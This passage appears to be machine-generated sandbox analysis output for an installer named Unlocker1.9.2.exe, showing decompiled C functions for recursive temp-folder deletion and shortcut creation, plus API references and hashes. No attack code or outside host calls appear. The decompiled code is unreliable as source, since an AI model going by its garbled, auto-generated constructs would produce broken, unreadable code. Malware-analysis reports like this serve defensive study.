							E004059FF(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E004059DD(_a4, _t37);
			}






























                                                                                                                                                              0x004059ff
                                                                                                                                                              0x004059ff
                                                                                                                                                              0x004059ff
                                                                                                                                                              0x00405a05
                                                                                                                                                              0x00405a0a
                                                                                                                                                              0x00405a0c
                                                                                                                                                              0x00405a1b
                                                                                                                                                              0x00405a1b
                                                                                                                                                              0x00405a1d
                                                                                                                                                              0x00405a26
                                                                                                                                                              0x00405a28
                                                                                                                                                              0x00405a2d
                                                                                                                                                              0x00405a30
                                                                                                                                                              0x00405a31
                                                                                                                                                              0x00405a38
                                                                                                                                                              0x00405a3a
                                                                                                                                                              0x00405a40
                                                                                                                                                              0x00405a43
                                                                                                                                                              0x00405a43
                                                                                                                                                              0x00405c1c
                                                                                                                                                              0x00405c1c
                                                                                                                                                              0x00405c20
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405a50
                                                                                                                                                              0x00405a56
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405a5c
                                                                                                                                                              0x00405a5d
                                                                                                                                                              0x00405a60
                                                                                                                                                              0x00405a63
                                                                                                                                                              0x00405c0f
                                                                                                                                                              0x00405c19
                                                                                                                                                              0x00405c1b
                                                                                                                                                              0x00405c1b
                                                                                                                                                              0x00405c11
                                                                                                                                                              0x00405c13
                                                                                                                                                              0x00405c15
                                                                                                                                                              0x00405c16
                                                                                                                                                              0x00405c16
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405c0f
                                                                                                                                                              0x00405a69
                                                                                                                                                              0x00405a6d
                                                                                                                                                              0x00405a7d
                                                                                                                                                              0x00405a81
                                                                                                                                                              0x00405a88
                                                                                                                                                              0x00405a8b
                                                                                                                                                              0x00405a8f
                                                                                                                                                              0x00405a95
                                                                                                                                                              0x00405a98
                                                                                                                                                              0x00405a9b
                                                                                                                                                              0x00405a9e
                                                                                                                                                              0x00405bb9
                                                                                                                                                              0x00405bbc
                                                                                                                                                              0x00405bec
                                                                                                                                                              0x00405bef
                                                                                                                                                              0x00405bf4
                                                                                                                                                              0x00405bf8
                                                                                                                                                              0x00405bf8
                                                                                                                                                              0x00405bfd
                                                                                                                                                              0x00405bfe
                                                                                                                                                              0x00405c03
                                                                                                                                                              0x00405c06
                                                                                                                                                              0x00405c08
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405c08
                                                                                                                                                              0x00405bbe
                                                                                                                                                              0x00405bc1
                                                                                                                                                              0x00405bd6
                                                                                                                                                              0x00405bdd
                                                                                                                                                              0x00405bc3
                                                                                                                                                              0x00405bca
                                                                                                                                                              0x00405bca
                                                                                                                                                              0x00405be5
                                                                                                                                                              0x00405be8
                                                                                                                                                              0x00405bb1
                                                                                                                                                              0x00405bb2
                                                                                                                                                              0x00405bb2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405be8
                                                                                                                                                              0x00405aa6
                                                                                                                                                              0x00405aa7
                                                                                                                                                              0x00405aad
                                                                                                                                                              0x00405aaf
                                                                                                                                                              0x00405ac9
                                                                                                                                                              0x00405ac9
                                                                                                                                                              0x00405ad0
                                                                                                                                                              0x00405ad0
                                                                                                                                                              0x00405ad7
                                                                                                                                                              0x00405adb
                                                                                                                                                              0x00405adb
                                                                                                                                                              0x00405adc
                                                                                                                                                              0x00405ade
                                                                                                                                                              0x00405b17
                                                                                                                                                              0x00405b1a
                                                                                                                                                              0x00405b2a
                                                                                                                                                              0x00405b2d
                                                                                                                                                              0x00405b35
                                                                                                                                                              0x00405b3b
                                                                                                                                                              0x00405b3b
                                                                                                                                                              0x00405b97
                                                                                                                                                              0x00405b97
                                                                                                                                                              0x00405b99
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405b3f
                                                                                                                                                              0x00405b46
                                                                                                                                                              0x00405b47
                                                                                                                                                              0x00405b49
                                                                                                                                                              0x00405b63
                                                                                                                                                              0x00405b71
                                                                                                                                                              0x00405b77
                                                                                                                                                              0x00405b79
                                                                                                                                                              0x00405b94
                                                                                                                                                              0x00405b94
                                                                                                                                                              0x00405b94
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405b94
                                                                                                                                                              0x00405b7f
                                                                                                                                                              0x00405b8a
                                                                                                                                                              0x00405b90
                                                                                                                                                              0x00405b92
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405b92
                                                                                                                                                              0x00405b4b
                                                                                                                                                              0x00405b4e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405b5d
                                                                                                                                                              0x00405b5f
                                                                                                                                                              0x00405b61
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405b61
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405b97
                                                                                                                                                              0x00405b22
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ae0
                                                                                                                                                              0x00405ae5
                                                                                                                                                              0x00405afb
                                                                                                                                                              0x00405b00
                                                                                                                                                              0x00405b03
                                                                                                                                                              0x00405ba0
                                                                                                                                                              0x00405ba0
                                                                                                                                                              0x00405ba4
                                                                                                                                                              0x00405bac
                                                                                                                                                              0x00405bac
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ba4
                                                                                                                                                              0x00405b0d
                                                                                                                                                              0x00405b9b
                                                                                                                                                              0x00405b9b
                                                                                                                                                              0x00405b9e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405b9e
                                                                                                                                                              0x00405ade
                                                                                                                                                              0x00405ab1
                                                                                                                                                              0x00405ab5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ab7
                                                                                                                                                              0x00405abb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405abd
                                                                                                                                                              0x00405ac1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ac3
                                                                                                                                                              0x00405ac3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ac3
                                                                                                                                                              0x00405ac1
                                                                                                                                                              0x00405c26
                                                                                                                                                              0x00405c30
                                                                                                                                                              0x00405c3c
                                                                                                                                                              0x00405c3c
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetVersion.KERNEL32(00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,00404DB3,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000), ref: 00405AA7
                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00405B22
                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00405B35
                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,007D06EE), ref: 00405B71
                                                                                                                                                              • SHGetPathFromIDListA.SHELL32(007D06EE,Remove folder: ), ref: 00405B7F
                                                                                                                                                              • CoTaskMemFree.OLE32(007D06EE), ref: 00405B8A
                                                                                                                                                              • lstrcatA.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BAC
                                                                                                                                                              • lstrlenA.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,00404DB3,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000), ref: 00405BFE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                              • String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$]t
                                                                                                                                                              • API String ID: 900638850-3710924873
                                                                                                                                                              • Opcode ID: 2d5ebac93c140e73d4be386df5cf957c2dfe9d46f2c0b54d72834ecc596bd5b5
                                                                                                                                                              • Instruction ID: d3edd175ae4d098aa1e1d30cbcff8d3f456ad99068bf2b680a9da6a8a672f2a4
                                                                                                                                                              • Opcode Fuzzy Hash: 2d5ebac93c140e73d4be386df5cf957c2dfe9d46f2c0b54d72834ecc596bd5b5
                                                                                                                                                              • Instruction Fuzzy Hash: 30511471A04A04ABEB215F68DC84B7F3BB4EB55324F14423BE911B62D1D27C6981DF4E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00405302 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 156filestringCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 723 405302-40531d call 4055b1 726 405336-405340 723->726 727 40531f-405331 DeleteFileA 723->727 729 405342-405344 726->729 730 405354-405362 call 4059dd 726->730 728 4054ca-4054cd 727->728 731 405475-40547b 729->731 732 40534a-40534e 729->732 738 405371-405372 call 405517 730->738 739 405364-40536f lstrcatA 730->739 731->728 734 40547d-405480 731->734 732->730 732->731 736 405482-405488 734->736 737 40548a-405492 call 405cd8 734->737 736->728 737->728 747 405494-4054a9 call 4054d0 call 405695 RemoveDirectoryA 737->747 741 405377-40537a 738->741 739->741 744 405385-40538b lstrcatA 741->744 745 40537c-405383 741->745 746 405390-4053ae lstrlenA FindFirstFileA 744->746 745->744 745->746 748 4053b4-4053cb call 4054fb 746->748 749 40546b-40546f 746->749 762 4054c2-4054c5 call 404d7b 747->762 763 4054ab-4054af 747->763 756 4053d6-4053d9 748->756 757 4053cd-4053d1 748->757 749->731 751 405471 749->751 751->731 760 4053db-4053e0 756->760 761 4053ec-4053fa call 4059dd 756->761 757->756 759 4053d3 757->759 759->756 765 4053e2-4053e4 760->765 766 40544a-40545c FindNextFileA 760->766 774 405411-405420 call 405695 DeleteFileA 761->774 775 4053fc-405404 761->775 762->728 763->736 768 4054b1-4054c0 call 404d7b call 40572b 763->768 765->761 769 4053e6-4053ea 765->769 766->748 771 405462-405465 FindClose 766->771 768->728 769->761 769->766 771->749 783 405442-405445 call 404d7b 774->783 784 405422-405426 774->784 775->766 778 405406-40540f call 405302 775->778 778->766 783->766 785 405428-405438 call 404d7b call 40572b 784->785 786 40543a-405440 784->786 785->766 786->766
                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00405302(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004055B1(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f08 =  *0x423f08 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E004059DD(0x421480, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405517(_t72);
					} else {
						lstrcatA(0x421480, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]); // executed
						_t37 = FindFirstFileA(0x421480,  &_v332); // executed
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004054FB( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E004059DD(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E00405695(_t72);
									_t52 = DeleteFileA(_t72); // executed
									__eflags = _t52;
									if(_t52 != 0) {
										E00404D7B(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f08 =  *0x423f08 + 1;
										} else {
											E00404D7B(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E0040572B();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405302(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x421480 - 0x5c;
					if( *0x421480 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405CD8(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004054D0(_t72);
							E00405695(_t72);
							_t37 = RemoveDirectoryA(_t72); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D7B(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404D7B(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E0040572B();
						}
						L33:
						 *0x423f08 =  *0x423f08 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                                                                                              0x0040530d
                                                                                                                                                              0x00405311
                                                                                                                                                              0x0040531a
                                                                                                                                                              0x0040531d
                                                                                                                                                              0x00405320
                                                                                                                                                              0x00405328
                                                                                                                                                              0x0040532a
                                                                                                                                                              0x0040532b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040532b
                                                                                                                                                              0x0040533a
                                                                                                                                                              0x0040533a
                                                                                                                                                              0x0040533d
                                                                                                                                                              0x00405340
                                                                                                                                                              0x00405354
                                                                                                                                                              0x0040535b
                                                                                                                                                              0x00405360
                                                                                                                                                              0x00405362
                                                                                                                                                              0x00405372
                                                                                                                                                              0x00405364
                                                                                                                                                              0x0040536a
                                                                                                                                                              0x0040536a
                                                                                                                                                              0x00405377
                                                                                                                                                              0x0040537a
                                                                                                                                                              0x00405385
                                                                                                                                                              0x0040538b
                                                                                                                                                              0x00405390
                                                                                                                                                              0x004053a0
                                                                                                                                                              0x004053a2
                                                                                                                                                              0x004053a8
                                                                                                                                                              0x004053ab
                                                                                                                                                              0x004053ae
                                                                                                                                                              0x0040546b
                                                                                                                                                              0x0040546b
                                                                                                                                                              0x0040546f
                                                                                                                                                              0x00405471
                                                                                                                                                              0x00405471
                                                                                                                                                              0x00405471
                                                                                                                                                              0x00405471
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004053b4
                                                                                                                                                              0x004053b4
                                                                                                                                                              0x004053bd
                                                                                                                                                              0x004053c3
                                                                                                                                                              0x004053c8
                                                                                                                                                              0x004053cb
                                                                                                                                                              0x004053cd
                                                                                                                                                              0x004053d1
                                                                                                                                                              0x004053d3
                                                                                                                                                              0x004053d3
                                                                                                                                                              0x004053d1
                                                                                                                                                              0x004053d6
                                                                                                                                                              0x004053d9
                                                                                                                                                              0x004053ec
                                                                                                                                                              0x004053ee
                                                                                                                                                              0x004053f3
                                                                                                                                                              0x004053fa
                                                                                                                                                              0x00405412
                                                                                                                                                              0x00405418
                                                                                                                                                              0x0040541e
                                                                                                                                                              0x00405420
                                                                                                                                                              0x00405445
                                                                                                                                                              0x00405422
                                                                                                                                                              0x00405422
                                                                                                                                                              0x00405426
                                                                                                                                                              0x0040543a
                                                                                                                                                              0x00405428
                                                                                                                                                              0x0040542b
                                                                                                                                                              0x00405430
                                                                                                                                                              0x00405432
                                                                                                                                                              0x00405433
                                                                                                                                                              0x00405433
                                                                                                                                                              0x00405426
                                                                                                                                                              0x004053fc
                                                                                                                                                              0x00405402
                                                                                                                                                              0x00405404
                                                                                                                                                              0x0040540a
                                                                                                                                                              0x0040540a
                                                                                                                                                              0x00405404
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004053fa
                                                                                                                                                              0x004053db
                                                                                                                                                              0x004053de
                                                                                                                                                              0x004053e0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004053e2
                                                                                                                                                              0x004053e4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004053e6
                                                                                                                                                              0x004053ea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040544a
                                                                                                                                                              0x00405454
                                                                                                                                                              0x0040545a
                                                                                                                                                              0x0040545a
                                                                                                                                                              0x00405465
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405465
                                                                                                                                                              0x0040537c
                                                                                                                                                              0x00405383
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405342
                                                                                                                                                              0x00405342
                                                                                                                                                              0x00405344
                                                                                                                                                              0x00405475
                                                                                                                                                              0x00405478
                                                                                                                                                              0x0040547b
                                                                                                                                                              0x004054cd
                                                                                                                                                              0x004054cd
                                                                                                                                                              0x004054cd
                                                                                                                                                              0x0040547d
                                                                                                                                                              0x00405480
                                                                                                                                                              0x0040548b
                                                                                                                                                              0x00405490
                                                                                                                                                              0x00405492
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405495
                                                                                                                                                              0x0040549b
                                                                                                                                                              0x004054a1
                                                                                                                                                              0x004054a7
                                                                                                                                                              0x004054a9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004054c5
                                                                                                                                                              0x004054ab
                                                                                                                                                              0x004054af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004054b4
                                                                                                                                                              0x004054b9
                                                                                                                                                              0x004054ba
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004054bb
                                                                                                                                                              0x00405482
                                                                                                                                                              0x00405482
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405482
                                                                                                                                                              0x0040534a
                                                                                                                                                              0x0040534e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040534e

                                                                                                                                                              APIs
                                                                                                                                                              • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 00405320
                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv5446.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsv5446.tmp\*.*,?,00000000,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 0040536A
                                                                                                                                                              • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nsv5446.tmp\*.*,?,00000000,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 0040538B
                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsv5446.tmp\*.*,?,00000000,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 00405391
                                                                                                                                                              • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsv5446.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsv5446.tmp\*.*,?,00000000,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 004053A2
                                                                                                                                                              • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 00405454
                                                                                                                                                              • FindClose.KERNEL32(?), ref: 00405465
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Unlocker1.9.2.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsv5446.tmp\*.*$\*.*
                                                                                                                                                              • API String ID: 2035342205-2397871174
                                                                                                                                                              • Opcode ID: ab34e0f4a398502fe4f841fd0ab2e19b6a8460b2f5b0e4388ce4a397f92dccb8
                                                                                                                                                              • Instruction ID: 4b200e60d3e8d58e0ab6cbb93b3ca9934a2dcfa31e3b076817fab6d13423d761
                                                                                                                                                              • Opcode Fuzzy Hash: ab34e0f4a398502fe4f841fd0ab2e19b6a8460b2f5b0e4388ce4a397f92dccb8
                                                                                                                                                              • Instruction Fuzzy Hash: 45511230844A48B6DB226B228C45BFF3A78DF4275AF14813BF845751D1C77C4981DE6E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00402020 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134comCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                              			E00402020() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				short* _t99;
				void* _t100;

				 *(_t100 - 0x30) = E004029F6(0xfffffff0);
				_t96 = E004029F6(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029F6(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029F6(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029F6(0x45);
				if(E0040553D(_t96) == 0) {
					E004029F6(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44); // executed
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Program Files\\Unlocker");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t99 = L"C:\\Users\\jones\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Unlocker\\Uninstall.lnk";
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, _t99, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, _t99, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}






















                                                                                                                                                              0x00402029
                                                                                                                                                              0x00402033
                                                                                                                                                              0x0040203c
                                                                                                                                                              0x00402046
                                                                                                                                                              0x0040204f
                                                                                                                                                              0x00402059
                                                                                                                                                              0x0040205d
                                                                                                                                                              0x0040205d
                                                                                                                                                              0x00402062
                                                                                                                                                              0x00402073
                                                                                                                                                              0x0040207b
                                                                                                                                                              0x0040215b
                                                                                                                                                              0x0040215b
                                                                                                                                                              0x00402162
                                                                                                                                                              0x00402081
                                                                                                                                                              0x00402081
                                                                                                                                                              0x00402092
                                                                                                                                                              0x00402096
                                                                                                                                                              0x0040209c
                                                                                                                                                              0x004020a6
                                                                                                                                                              0x004020a8
                                                                                                                                                              0x004020b3
                                                                                                                                                              0x004020b6
                                                                                                                                                              0x004020c3
                                                                                                                                                              0x004020c5
                                                                                                                                                              0x004020c7
                                                                                                                                                              0x004020ce
                                                                                                                                                              0x004020d1
                                                                                                                                                              0x004020d1
                                                                                                                                                              0x004020d4
                                                                                                                                                              0x004020de
                                                                                                                                                              0x004020e6
                                                                                                                                                              0x004020eb
                                                                                                                                                              0x004020f7
                                                                                                                                                              0x004020f7
                                                                                                                                                              0x004020fa
                                                                                                                                                              0x00402103
